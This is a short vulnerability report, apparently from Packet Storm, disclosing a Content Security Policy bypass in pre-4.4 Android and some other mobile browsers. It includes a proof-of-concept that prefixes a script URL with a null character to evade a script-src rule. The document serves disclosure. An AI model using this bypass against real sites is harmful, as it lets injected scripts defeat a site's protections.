Android browser versions prior to 4.4 suffer from a content security policy bypass vulnerability.
c025012db431aa2729019d62795c5330dddd15111cc6d1adde46fceaaa29c232Hello. I hope this is the correct place to report this bug.
I've found a Content Security Policy bypass similar to the same and related to the same origin policy bypass in this CVE. This is a separate vulnerability, however.
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-6041
I've tested this on an Android 4.3 tablet. I've tested this and it works on Firefox (32.0.2), InBrowser, Dolphin (App info doesn't give version). I also tested the default android browser on 4.3.1 emulator which was also vulnerable.
PoC:
<input type=button value="test" onclick="
a=document.createElement('script');
a.id='AA';
a.src='\u0000https://js.stripe.com/v2/';
document.body.appendChild(a);
setTimeout(function(){if(typeof(document.getElementById('AA'))!=='undefined'){alert(Stripe);}else{ alert(2);}}, 400);
return false;">
The content security policy rule that should block this is
script-src 'self' https://js.stripe.com/v2/ ;
The PoC worked if you see a popup containing stripes e(){} object. You can test this on http://ejj.io/test.php
Cheers,
Evan J
© 2024 Packet Storm. All rights reserved.
%7Cutmcsr%3D(direct)%7Cutmcmd%3D(none)){kind=small}
Follow us on Twitter
Follow us on Facebook
Subscribe to an RSS Feed